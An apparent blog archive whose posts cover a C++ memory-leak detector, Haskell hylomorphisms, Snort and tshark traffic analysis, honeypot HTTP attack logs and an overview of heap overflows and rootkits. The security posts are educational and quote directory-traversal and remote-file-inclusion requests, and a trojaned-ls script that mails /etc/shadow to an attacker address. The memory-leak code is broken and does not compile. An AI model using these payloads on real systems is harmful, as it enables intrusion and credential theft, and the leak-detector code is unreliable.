## Memory Leak detector

1 12 2010

When you are writing a program and you want it to be able to run for a long period of time or when some procedure is called a $x$ times in the lifetime of running program (let $x$ tend to infinity) maybe is a good opportunity to make sure all your $malloc$ calls have one $free$ call ($new$,$delete$ in C++).This sounds very natural to any experienced programmer.

Now imagine that you have download some huge chunk of code and you want to call it $x$ times, lets say 100 times per second. Maybe the person who wrote the code, did not think about memory management and maybe you do not have the patience to read the huge piece of code. What you need is a memory leak detector.

If you do not have any of these problems might be interested in knowing how to gain millions of euros on the internet.

Here I will show an example of how to write a simple memory leak detector in C++ for C $(malloc,free)$, is trivial to convert it to verify memory leaks in C++.

The main idea is to keep the line number of each $malloc$ we do and then verify if we did $free$, we will accomplish this by redefining the $malloc$ and $free$ call, without need to write our own $free$ or $malloc$, thanks to C pre processor.

First we define an entity, this keep all the information we need about each $malloc$ call.

```class Entity {
private:
unsigned int _line;
public:
Entity(unsigned int addr, unsigned int line) {
this->_line = line;
}
}
unsigned int getLine() {
return this->_line;
}
};

typedef std::list<Entity *> Memory;
Memory *memory;
```

I used the standard C++ lists instead of std::vector because I will need to remove and add elements, without the need to call $find$ in algorithms module, what bugs me.

Now I will define the function to add elements to our std::list

```void InsertOnMalloc(unsigned int addr, unsigned int n) {
if(!memory)
memory = new Memory;

}
```

Now I will define the function to remove elements to our std::list

```void RemoveOnFree(unsigned int addr) {
if(!memory)
return;
for(Memory::iterator it = memory->begin(); it != allocList->end(); it++)
{
Entity *entity = *it;
memory->remove();
break;
}
}
}
```

The idea so far is to call $InsertOnMalloc$ for each $malloc$ call and $RemoveOnFree$ for each $free$. After this if we have any element in our $memory$ we need to print that out, to see which line we do not call $free$.

```void ShowLeaks() {
for(Memory::iterator it = memory->begin(); it != memory->end(); it++)
std::cout << "Must make free to this malloc call: " << (*it)->getLine() << std::endl;
}
```

Now, lets do the real juice of this leak detector: here I will modify the $malloc$ call to a regular $malloc$ followed by an insertion, and a $free$ call for a regular $free$ call followed by removal on our $memory$ list

```#define malloc(p) mallocz((p),__LINE__)
#define free(p) freez((p))

static inline void *  mallocz(unsigned int size, int line) {
#undef malloc
void *ptr = (void *)malloc(size);
#define malloc(p) mallocz((p),__LINE__)
Insert((unsigned int)ptr, line);
return(ptr);
};
static inline void  mydelz(void *p) {
RemoveOnFree((int)p);
#undef free
free(p);
#define free(p) freez((p))
};
```

Now, if you want to use this “library” in your code, you save it to file $filename.h$ and on you code you just import it and then call $ShowLeaks()$ to show what $mallocs$ you forgot to make $free$.

9 04 2009

If you lost yourself in this post, I advise you to start in catamorphisms, then anamorphisms and then hylomorphisms.

Like I said before (in those posts) when you write an hylomorphism over a particular data type, that means just that the intermediate structure is that data type.



In fact that data will never be stored into that intermediate type $C$ or $D$. Because we glue the ana and cata together into a single recursive pattern. $A$ and $E$ could be some data type your function need. With this post I will try to show you more hylomorphisms over some different data types to show you the power of this field.

## Leaf Tree’s

The data type that we going to discuss here is the $LTree$. In Haskell we can represent $LTree$ as:

```data LTree a = Leaf a | Fork (LTree a, LTree a)
```

Is just like a binary tree, but the information is just in the leaf’s. Even more: a leaf tree is a tree that only have leaf’s, no information on the nodes. This is an example of a leaf tree:


To represent all the hylomorphisms over $Ltree$ we draw the following diagram:


The example I’m going to give is making the fibonacci function using a hylomorphism over this data type. If you remember the method I used before, I’m going to start by the anamorphism $[(h)]$. Before that I’m going to specify the strategy to define factorial. I’m going to use the diagram’s again, remember that type $1$ is equivalent to Haskell $( )$:



As you can see I’m going to use $Ltree~1$ as my intermediate structure, and I’ve already define the names of my gen functions $add$ to the catamorphism and $fibd$ to the anamorphism. The strategy I prefer, is do all the hard work in the anamorphism, so here the gen $fibd$ for the anamorphism is:

```fibd n | n < 2     = i1   ()
| otherwise = i2   (n-1,n-2)
```

This function combined with the anamorphism, going to generate leaf tree’s with $n$ leaf’s, being $n$ the result of that fib.

Then we just have to write the gen $add$ for the catamorphism. This function (combined with the catamorphism) counts the number of leafs that a leaf tree have.

```add = either (const 1) plus
where plus = uncurry (+)
```

The final function, the fibonacci function is the hylomorphism of those two defined before:

```fib =  hyloLTree add fibd
```

Here is all the auxiliary functions you need to run this example:

```inLTree = either Leaf Fork

outLTree :: LTree a -> Either a (LTree a,LTree a)
outLTree (Leaf a)     = i1   a
outLTree (Fork (t1,t2)) = i2    (t1,t2)

cataLTree a = a . (recLTree (cataLTree a)) . outLTree

anaLTree f = inLTree . (recLTree (anaLTree f) ) . f

hyloLTree a c = cataLTree a . anaLTree c

baseLTree g f = g -|- (f >< f)

recLTree f = baseLTree id f
```

## Lists

The lists that I’m going to talk here, are the Haskell lists, wired into the compiler, but is a definition exist, it will be:

```data [a] = [ ] | a : [a]
```

So, our diagram to represent the hylomorphism over this data type is:


The function I’m going to define as a hylomorphism is the factorial function. So, we know that our domain and co-domain is $Integers$, so now we can make a more specific diagram to represent our solution:



As you can see I’m going to use $[Integer]$ to represent my intermediate data, and I’ve already define the names of my gen functions $mul$ to the catamorphism and $nats$ to the anamorphism. Another time, that I do all the work with the anamorphism, letting the catamorphism with little things to do (just multiply). I’m start to show you the catamorphism first:

```mul = either (const 1) mul'
where mul' = uncurry (*)
```

As you can see the only thing it does is multiply all the elements of a list, and multiply by 1 when reach the $[]$ empty list.

In the other side, the anamorphism is generating a list of all the elements, starting in $n$ (the element we want to calculate the factorial) until 1.

```nats = (id -|- (split succ id)) . outNat
```

And finally we combine this together with our hylo, that defines the factorial function:

```fac = hylo mul nats
```

Here is all the code you need to run this example:

```inl = either (const []) (uncurry (:))

out []    = i1 ()
out (a:x) = i2(a,x)

cata g   = g . rec (cata g) . out

ana h    = inl . (rec (ana h) ) . h

hylo g h = cata g . ana h

rec f    = id -|- id >< f
```

## Binary Tree’s

Here, I’m going to show you the hanoi problem solved with one hylomorphism, first let’s take a look at the $Btree$ structure:

```data BTree a = Empty | Node(a, (BTree a, BTree a))
```

So, our generic diagram representing one hylomorphism over $BTree$ is:


There is a well-known inductive solution to the problem given by the pseudocode below. In this solution we make use of the fact that the given problem is symmetrical with respect to all three poles. Thus it is undesirable to name the individual poles. Instead we visualize the poles as being arranged in a circle; the problem is to move the tower of disks from one pole to the next pole in a speciﬁed direction around the circle. The code deﬁnes $H_n.d$ to be a sequence of pairs $(k, d)$ where n is the number of disks, $k$ is a disk number and $d$ are directions. Disks are numbered from $0$ onwards, disk $0$ being the smallest. Directions are boolean values, $true$ representing a clockwise movement and $false$ an anti-clockwise movement. The pair $(k, d)$ means move the disk numbered $k$ from its current position in the direction $d$.

excerpt from R. Backhouse, M. Fokkinga / Information Processing Letters 77 (2001) 71–76

So, here, I will have a diagram like that, $b$ type stands for $Bool$ and $i$ type for $Integer$:


I’m going to show all the solution here, because the description of the problem is in this quote, and in the paper:

```hanoi = hyloBTree f h

f = either (const []) join
where join(x,(l,r))=l++[x]++r

h(d,0) = Left ()
h(d,n+1) = Right ((n,d),((not d,n),(not d,n)))
```

And here it is, all the code you need to run this example:

```inBTree :: Either () (b,(BTree b,BTree b)) -> BTree b
inBTree = either (const Empty) Node

outBTree :: BTree a -> Either () (a,(BTree a,BTree a))
outBTree Empty              = Left ()
outBTree (Node (a,(t1,t2))) = Right(a,(t1,t2))

baseBTree f g = id -|- (f >< g))

cataBTree g = g . (recBTree (cataBTree g)) . outBTree

anaBTree g = inBTree . (recBTree (anaBTree g) ) . g

hyloBTree h g = cataBTree h . anaBTree g

recBTree f = baseBTree id f
```

## Outroduction

Maybe in the future I will talk more about that subject.

## Capture and dissect network traffic

1 04 2009

Currently I am doing research at the University of Minho in the group of distributed systems, with duration of one year. My job is to find a way to identify specific links between a user and a distributed system. The general idea is to draw a map of services in a distributed system. This post only refers to the first milestone.

The proposal was to make such a system using Snort.

## Snort

Snort is a Network intrusion detection system, that means with Snort you can detect malicious activity in your network. We can detect many types of network attacks. We can identify DoS, DDoS attacks, port scans, cracking attempts, and much more.

Snort can operate in two different ways. We can set up Snort to run in passive mode, putting it to listen in promiscuous mode. That is, because Ethernet network switches send traffic to all computers connected to itself, we get traffic addressed to other machines on the network. To do this we only need to connect to the network and turn Snort on in our machine, no one knows that we are recording every traffic (including traffic destined for other computers).

Snort may also run in active mode. This “active” is not able to modify the data channel, but to be able to be installed in a network, a router for example and reap more information than in passive mode. Thus it makes sense to use the capacity of rules that Snort supports, to filter the traffic that it read.

To do this, Snort capture all packets that pass the network and interprets each. As the rules we have defined Snort tries to find these patterns in each packet, or each set of packets and take certain actions for each of them.

For example, if a large number of TCP requests reach a particular host, to a large number of ports in a short space of time we probably are the target of a port scan. NIDS like Snort know how to find these patterns and alerting the network administrator.

## Objective

Our aim was to use Snort to capture all traffic into passive mode.

`root@pig:# snort -u snort -g snort -D -d -l /var/log/snort -c /etcsnort/snort.debian.conf -i eth0`

We are saving the logs in binary (tcpdump format), for that I use the “-d -l /dir/” flags. I prefer to save all the packets into binary because is more easier to parse, than the structure of files and directories that Snort creates by default.

I started by trying to use some language that advised me to try to do the parsing of the file created by snort. Initially started to use python, but only find a tcpdump parser and could not get more than one file translated in tcpdump to hexadecimal.
After that I tried to use Haskell and I was amazed!

House is a Haskell Operative System done by The Programatica Project.

This is a system than can serve as a platform for exploring various ideas relating to low-level and system-level programming in a high-level functional language.

And indeed helped me a lot in doing my job. This project have already done a lot of parsers for network packets. It implements the Ethernet, IPv4, IPv6, TCP, UDP, ICMP, ARP and I think is all.

The libpcap (tcpdump parser) is already implemented in Haskell too, so is very simple to parse a complete packet:

```getPacket :: [Word8] -> InPacket
getPacket bytes =  toInPack \$ listArray (0,Prelude.length bytes-1) \$ bytes

-- Ethernet | IP | TCP | X
getPacketTCP :: [Word8] -> Maybe (NE.Packet (NI4.Packet (NT.Packet InPacket)))
getPacketTCP bytes = doParse \$ getPacket bytes :: Maybe (NE.Packet (NI4.Packet (NT.Packet InPacket)))
```

As you can see is too easy to have a compete structure of a packet parsed with this libraries. The problem is that they don’t have already implemented a application packet parser. So, according to that image:

This is the level of depth we can go with this libraries. What is very good, but not perfect for me :S

My supervisor told me to start searching a new tool to do this job. I was sad because I could not do everything in Haskell. But it is already promised that I will continue this project in Haskell. You can see the git repo here.

I find tshark, a great tool to dissect and analyze data inside tcpdump files.

## The power of tshark

tshark is the terminal based Wireshark, with it we can do everything we do with wireshark.

Show all communications with the IP 192.168.74.242

```root@pig:# tshark -R "ip.addr == 192.168.74.242" -r snort.log
```
```...
7750 6079.816123 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Key Exchange Init
7751 6079.816151 192.168.74.242 -> 193.136.19.96 TCP ssh > 51919 [ACK] Seq=37 Ack=825 Win=7424 Len=0 TSV=131877388 TSER=1789588
7752 6079.816528 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Key Exchange Init
7753 6079.817450 193.136.19.96 -> 192.168.74.242 TCP 51919 > ssh [ACK] Seq=825 Ack=741 Win=7264 Len=0 TSV=1789588 TSER=131877389
7754 6079.817649 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Diffie-Hellman GEX Request
7755 6079.820784 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Diffie-Hellman Key Exchange Reply
7756 6079.829495 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Diffie-Hellman GEX Init
7757 6079.857490 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Diffie-Hellman GEX Reply
7758 6079.884000 193.136.19.96 -> 192.168.74.242 SSHv2 Client: New Keys
7759 6079.922576 192.168.74.242 -> 193.136.19.96 TCP ssh > 51919 [ACK] Seq=1613 Ack=1009 Win=8960 Len=0 TSV=131877415 TSER=1789605
...
```

Show with a triple: (time, code http, http content size), separated by ‘,’ and between quotation marks.

```root@pig:# tshark -r snort.log -R http.response -T fields -E header=y -E separator=',' -E quote=d -e frame.time_relative -e http.response.code -e http.content_length
```
```...
"128.341166000","200","165504"
"128.580181000","200","75332"
"128.711618000","200","1202"
"149.575548000","206","1"
"149.719938000","304",
"149.882290000","404","338"
"150.026474000","404","341"
"150.026686000","404","342"
"150.170295000","304",
"150.313576000","304",
"150.456650000","304",
...
```

Show a tuple of arity 4 with: (time, source ip, destination ip, tcp packet size).

```root@pig:# tshark -r snort.log -R "tcp.len>0" -T fields -e frame.time_relative -e ip.src -e ip.dst -e tcp.len
```
```...
551.751252000   193.136.19.96   192.168.74.242  48
551.751377000   192.168.74.242  193.136.19.96   144
551.961545000   193.136.19.96   192.168.74.242  48
551.961715000   192.168.74.242  193.136.19.96   208
552.682260000   193.136.19.96   192.168.74.242  48
552.683955000   192.168.74.242  193.136.19.96   1448
552.683961000   192.168.74.242  193.136.19.96   1448
552.683967000   192.168.74.242  193.136.19.96   512
555.156301000   193.136.19.96   192.168.74.242  48
555.158474000   192.168.74.242  193.136.19.96   1448
555.158481000   192.168.74.242  193.136.19.96   1400
556.021205000   193.136.19.96   192.168.74.242  48
556.021405000   192.168.74.242  193.136.19.96   160
558.874202000   193.136.19.96   192.168.74.242  48
558.876027000   192.168.74.242  193.136.19.96   1448
...
```

Show with a triple: (source ip, destination ip, port of destination ip).

```root@pig:# tshark -r snort.log -Tfields  -e ip.src -e ip.dst -e tcp.dstport
```
```...
192.168.74.242  193.136.19.96   37602
192.168.74.242  193.136.19.96   37602
193.136.19.96   192.168.74.242  22
192.168.74.242  193.136.19.96   37602
193.136.19.96   192.168.74.242  22
193.136.19.96   192.168.74.242  22
192.168.74.242  193.136.19.96   37602
192.168.74.242  193.136.19.96   37602
192.168.74.242  193.136.19.96   37602
193.136.19.96   192.168.74.242  22
193.136.19.96   192.168.74.242  22
193.136.19.96   192.168.74.242  22
193.136.19.96   192.168.74.242  22
192.168.74.242  193.136.19.96   37602
192.168.74.242  193.136.19.96   37602
...
```

## Statistics

Hierarchy of protocols

`root@pig:# tshark -r snort.log -q -z io,phs`
```frame                                    frames:7780 bytes:1111485
eth                                    frames:7780 bytes:1111485
ip                                   frames:3992 bytes:848025
tcp                                frames:3908 bytes:830990
ssh                              frames:2153 bytes:456686
http                             frames:55 bytes:19029
http                           frames:5 bytes:3559
http                         frames:3 bytes:2781
http                       frames:2 bytes:2234
http                     frames:2 bytes:2234
data-text-lines                frames:10 bytes:5356
tcp.segments                     frames:3 bytes:1117
http                           frames:3 bytes:1117
media                        frames:3 bytes:1117
udp                                frames:84 bytes:17035
nbdgm                            frames:50 bytes:12525
smb                            frames:50 bytes:12525
mailslot                     frames:50 bytes:12525
browser                    frames:50 bytes:12525
dns                              frames:34 bytes:4510
llc                                  frames:3142 bytes:224934
stp                                frames:3040 bytes:182400
cdp                                frames:102 bytes:42534
loop                                 frames:608 bytes:36480
data                               frames:608 bytes:36480
arp                                  frames:38 bytes:2046
```

### Conversations

We use: -z conv,TYPE,FILTER

TYPE could be:

• eth,
• tr,
• fc,
• fddi,
• ip,
• ipx,
• tcp,
• udp

And the filters are used to restrict the statistics.

`root@pig:# tshark -r snort.log -q -z conv,ip,tcp.port==80`
```================================================================================
IPv4 Conversations
Filter:tcp.port==80
|           | |    Total    |
|Frames Bytes | |Frames Bytes | |Frames Bytes |
193.136.19.148  192.168.74.242 141    13091    202   259651    343   272742
192.168.74.242  128.31.0.36     22     6858     28     4784     50    11642
================================================================================
```

### IO

We use: -z io,stat,INT,FILTER,…,FILTER

`root@pig:# tshark -r snort.log -q -z io,stat,300,'not (tcp.port=22)'`
```===================================================================
IO Statistics
Interval: 300.000 secs
Column #0:
|   Column #0
Time            |frames|  bytes
000.000-300.000    2161    543979
300.000-600.000    1671    264877
600.000-900.000     508     46224
900.000-1200.000     185     12885
1200.000-1500.000     201     14607
1500.000-1800.000     187     13386
1800.000-2100.000     189     13887
2100.000-2400.000     187     13386
2400.000-2700.000     189     13887
2700.000-3000.000     187     13386
3000.000-3300.000     185     12885
3300.000-3600.000     189     13887
3600.000-3900.000     210     15546
3900.000-4200.000     189     13887
4200.000-4500.000     187     13386
4500.000-4800.000     185     12885
4800.000-5100.000     189     13887
===================================================================
```

## Conclusion

With tshark we could do everything we want to know what is inside a network packet. The trick is to understand the statistics that tshark generate, and know how to ask it.

Now my work will get a machine to run Snort in an active mode and begin to understand how to use Snort to do all this work of collecting information.

If you feel interested and understand Portuguese, see the presentation:

## HTTP attacks

23 01 2009

In this post I will talk about the HTTP results that I collected from the experience with one honeypot.
As you may know, I’ve been putting one honeypot running for 5 weeks. I’ve previously talked about SMTP and SSH attacks, now is the time for HTTP. This service (port 80) is by far the most fustigated service in the honeypot. And make sense, in this port we can have a lot of Web services with a lot of exploitable code running…

This chart represents the number of hit’s in the port 80, that our honeypot had during his activity:

## Open Proxy’s

An open proxy is like an Open mail relay, described in SMTP attacks. Anyone in the internet can use this systems to reduce their using of the bandwidth. For example, if an open proxy is located in your country, and if your internet provider only allow you to access web pages of your country, you can use this systems to visit outside pages.
The process is quite simple, if you are under a proxy and you want a web page, the proxy go get them for you and send that to you. All the traffic and effort was made by the proxy. Is just like a forwarding service.

Here at the University we have one closed proxy, and that is great, because a lot of pages are in cache, so even we have a 1Gb connection, the proxy don’t need to get the page we want, because have it in the cache.

### webcollage/1.135a

The webcollage is a program that seeks the Internet images and composes them in a window. Some have described as a pop culture program. This program makes random web searches and extract the images of the results.

There was a host that has make some hit’s in our honeypot’s, as we can see in the following extract from the file web.log:

```--MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,
"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
User-Agent: webcollage/1.135a
Referer: http://random.yahoo.com/fast/ryl
Host: www.morgangirl.com
",
--ENDMARK--
```

The interesting here is that this agent is trying to get an image using our honeypot as a open proxy. The possibilities is that our honeypot as been seen by a proxy scanner in the past that have add our honeypot to an open proxy list.

### Solution

We can do something, if this had happened for real. We can block the IP that made the request (92.240.68.152) to avoid future requests by this host. But the problem is not from this person who is using a program to get the images. The problem here is that we are targeted as an open proxy, and probably in the future we will be asked again to get some file.

A more comprehensive solution is to block all the requests made from this program. Adding this lines to the file “.htaccess” in the folder.

```# Start of .htaccess change.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^webcollage
RewriteRule ^.*\$ - [F]
# End of .htaccess change.
```

This won’t prevent all the attempts to use our server as open proxy, but will prevent all the requests made by this program.

## Directory traversal

A directory traversal attacks intend to exploit insufficient security validation of user-supplied input file names. The main objective of this attack is gain access to a computer file that is not intended to be accessible.

I will give you the Wikipedia example:
Imagine you have this PHP script running in your server, and this page have the name vulnerable.php:

```<?php
\$template = 'blue.php';
if ( isset( \$_COOKIE['TEMPLATE'] ) )
include ( "/home/users/phpguru/templates/" . \$template );
?>
```

If someone send you this request:

```GET /vulnerable.php HTTP/1.0
```

```HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
daemon:*:1:1::/tmp:
```

We have seen a lot of variations of this attack, as will show you after.

On 4 January 2009 dozens of hit’s were made from Lelystad, The Netherlands. These hit’s were performed to verify if our HTTP server allow directory traversal, to get the file /etc/passwd by the attacker.

In this case, the attacker wanted to acquire the /etc/passwd to perhaps have a list of the users that can access to the system. To possibly get access through any of them.

This type of attack is usually done not asking directly for the file through its conventional path, but in an encrypted way (using exa characters). With that variations it is more unlikely that the application perform validations on what the attacker wants.
Unfortunately our honeypot, not saved the log file’s during the day January 1 until 4, so we only can see in the other’s log’s the activity performed by this host. We cannot show the number of hit’s of this IP in day 4.
In the following listings I will show the pairs of command that the attacker wanted to do and the package that came to our honeypot.

```GET ../../../../../../../../../../etc/passwd HTTP/1.1
```
```--MARK--,"Sun Jan  4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,
"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
```
```GET .../../../../../../../../../../etc/passwd HTTP/1.1
```
```--MARK--,"Sun Jan  4 05:20:58 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59711,80,
"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
```
```GET ../../../../../../../../../../etc/passwd HTTP/1.1
```
```--MARK--,"Sun Jan  4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,
"GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
```
```GET ....................etcpasswd HTTP/1.1
```
```--MARK--,"Sun Jan  4 05:21:04 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59740,80,
"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
```
```GET //etc/passwd HTTP/1.1
```
```--MARK--,"Sun Jan  4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,
"GET %2F%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
```

### Conclusion

Possibly an attacker trying to do this in a real server would get the file he wanted, but our honeypot was not prepared to
respond to such attacks, and it only responds with a message 302:

```HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
Date: Sab Jan 10 21:46:17 WET 2009
Content-Type: text/html
Connection: close
Accept-Ranges: bytes
Expires: Sab Jan 10 21:46:17 WET 2009
Cache-control: private

<body><h1>Object Moved</h1>This object may be found <a HREF="http://bps-pc9.local.mynet/">here</a>.</body>
```

We can conclude that the requests that were sent to our honeypot mean that the attacker was using the NSE, which means nmap scripting engine. This is a tool that comes with nmap.
Allows the user to write scripts to automate various tasks in the network.

Here we can see the script that was used to perform this attack.

## Morfeus Fucking Scanner (MFS)

MFS is a scanner that search web pages with PHP vulnerabilities. This scanner has a large number of tests for known vulnerabilities in PHP scripts. Then we show some of those applications that MFS search for vulnerabilities.

### WebCalendar

The WebCalendar is a web calendar that can be used by one or more users, it is possible to create groups with calendars and it supports a wide range of databases.
This application uses several PHP files, one of those id send_reminder.php that contained serious vulnerabilities, one of which allowed the inclusion of remote files through variable “includedir” that was not validated. So anyone can add whatever he want on this page.

We found that this vulnerability only affects WebCalendar version 1.0.4, this application has now in version 1.2.
While our honeypot not have this application installed, although there were made some attempts to attacks on this application, two of them over the vulnerability of this file, as the log show’s.

```--MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,
"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Fucking Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--
```
```--MARK--,"Wed Dec 24 16:07:30 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55003,80,
"GET /calendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Fucking Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--
```

This scanner (MFS) scans a list of hosts and attempts to link up several times until the server be attacked.
In our case this type of request on port 80 only returns a 404 error.

The gif file that the attacker wants to include just print a message:

```echo (" Morfeus hacked you ");
```

### Conclusion

Although this file has been fixed in this application, the truth is that this scanner continues to include this as a test. The reason for this is that still have many applications with this vulnerability exposed on the Internet.

### Mambo/Joomla

The CMS Mambo is very popular and used worldwide. The Joomla is a derivative of the first one. In this applications have been discovered many bugs, MFS seems to use some of them. We saw one in particular:

```--MARK--,"Wed Dec 24 16:07:34 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55438,80,
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Fucking Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--
```

The attacker wants to set the variable mosConfig_absolute_path from the file index.php with the typical message that has already explained above. What we find is that the input passed to this file in not validated before being used to include files.
This system can be victim of one attack by allowing run code from any source without ever make payable checks.

### Prevent attacks from MFS

One way to block this type of attacks from MFS is to add the following lines of code in file. “htaccess” in the folder of the website.

```# Start of .htaccess change.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*\$ - [F]
# End of .htaccess change.
```

## Outroduction

Note that the “.htaccess” solutions that I gave only works for HTTP servers that use Apache. Users of IIS can use the IsapiRewrite tool.

22 01 2009

## Intro

This post is the continuation of Tracing the attack – Part I. And this post is the final one, of this stack.
Here I’m gonna to talk about the Heap/BSS Overflow and Rootkits.

## Heap

In the Stack, the memory is allocated by kernel (as explained in Part I). In the other hand the Heap is a structure where the program can dynamically allocate memory. With the use of malloc(), realloc() and calloc() functions.

## BSS segment

BSS stands for Block Started by Symbol and is used by compilers to store static variables. This variables are filled with zer-valued data at the start of the program. In C programing language all the not initialized and declared as static variables are placed in the BSS segment.

## Heap/BSS Overflow

As a simple example, extracted from w00w00 article, to demonstrate a heap overflow:

```   /* demonstrates dynamic overflow in heap (initialized data) */
#define BUFSIZE 16
#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

int main()
{
u_long diff;
char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

diff = (u_long)buf2 - (u_long)buf1;
printf("buf1 = %p, buf2 = %p, diff = 0x%x bytesn", buf1, buf2, diff);

memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '';

printf("before overflow: buf2 = %sn", buf2);
memset(buf1, 'B', (u_int)(diff + OVERSIZE));
printf("after overflow: buf2 = %sn", buf2);

return 0;
}
```

Now, when we execute this code with parameter 8:

```   [root /w00w00/heap/examples/basic]# ./heap1 8
buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA
```

This works like that, because buf1 overruns its boundary and write data in buf2 heap space. This program don’t crash because buf2 heap space still a valid segment.

To see a BSS overflow we just have to replace the:
‘char *buf = malloc(BUFSIZE)’, by: ‘static char buf[BUFSIZE]’

If the heap is non-executable that will prevent the use of function calls there. But even so, that won’t prevent heap overflows.

I won’t talk anymore about that subject in this post, if you want to learn more about that you can see the w00w00 article, and some-more from the references section (at the end of this post).

## Rootkits

After gaining access the target machine (using an exploit for example), the attacker must ensure will continue to have access even after the victim has fixed the vulnerability, and without it knows that the system remains compromised. And the attacker can achieve this through the installation of a rootkit on the target machine.
A rootkit is basically a set of tools (backdoors and trojan horses) designed with the aim to provide absolute control of the target machine. A backdoor is a way to authenticate a legitimate machine, providing remote access the same while trying to remain undetected. For example, you can take the form of a program or a change in a program already installed. A trojan horse (or just textittrojan) is usually a program that supposedly plays a role but which actually also plays other malicious functions without the knowledge of the victim.
Then we show a very simple example of a bash script that creates a possible trojaned ls:

```#!/ bin/bash
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail attacker@domain.com" > /bin/ls
/bin/echo "/ bin/ls.old" >> /bin/ls
chmod +x /bin/ls
```

It is clear that we are not considering the fact that the ls can receive arguments, this is just for example purposes. And is good to show an example of the objective of a trojan.

Usually the use of a real trojan would install a modified versions of several binary (lsof, ps, etc). The idea of changing this programs is to hide the trojan itself. With a ps changed command, the user could not see the trojan process running.

Here is a list of the changed programs when you install Linux Rootkit 4:

```bindshell	port/shell type daemon!
chfn		Trojaned! User > r00t
chsh		Trojaned! User > r00t
crontab     Trojaned! Hidden Crontab Entries
du		Trojaned! Hide files
find		Trojaned! Hide files
fix		File fixer!
ifconfig	Trojaned! Hide sniffing
inetd		Trojaned! Remote access
killall		Trojaned! Wont kill hidden processes
linsniffer	Packet sniffer!
ls             Trojaned! Hide files
netstat      Trojaned! Hide connections
passwd	Trojaned! User > r00t
pidof		Trojaned! Hide processes
ps		Trojaned! Hide processes
rshd		Trojaned! Remote access
sniffchk	Program to check if sniffer is up and running
syslogd	Trojaned! Hide logs
tcpd		Trojaned! Hide connections, avoid denies
top		Trojaned! Hide processes
wted		wtmp/utmp editor!
z2		Zap2 utmp/wtmp/lastlog eraser!
```

There are many rootkits over the network, the most common, compromise Windows and Unix systems.

## Detecting and removing rootkits

When someone suspect that his system have been compromised, the best thing wold be use some tool to detect and remove rootkits. We have, for Linux: chkrootkit and rkhunter and for Windows you can use the RootkitRevealer.

As curious, I would like to mention that in 2005, Sony BMG put a rootkit in several CDs of music that is self-installed (without notice) on computers where the CDs were read, for more about this.

## Outroduction

